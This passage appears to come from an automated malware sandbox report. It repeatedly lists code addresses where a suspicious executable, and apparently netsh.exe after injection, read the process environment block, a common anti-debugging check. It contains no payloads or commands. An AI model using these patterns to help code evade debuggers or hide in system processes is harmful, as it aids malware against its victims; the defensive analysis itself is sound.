Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C05BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C08B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B63B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B63B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B74A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B74A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C08A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B35210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B53A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B48A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B7927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BEB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BEB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BC4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B635A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BE8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BBA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B57D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C08D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B73D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C08CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B48794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B737F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B34F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B34F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C08F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C0070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C08ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B616E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B476E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B78EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B636CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BEFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BEFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B68E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BFAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03763B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03763B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03805BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0373DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0374EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03734F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03734F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037CFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037CFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037737F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0380070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0380070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0375DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03808B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03764BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03764BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03764BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03748794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03762397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0376B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03808F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037B7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_037F138A mov eax, dword ptr fs:[00000030h]
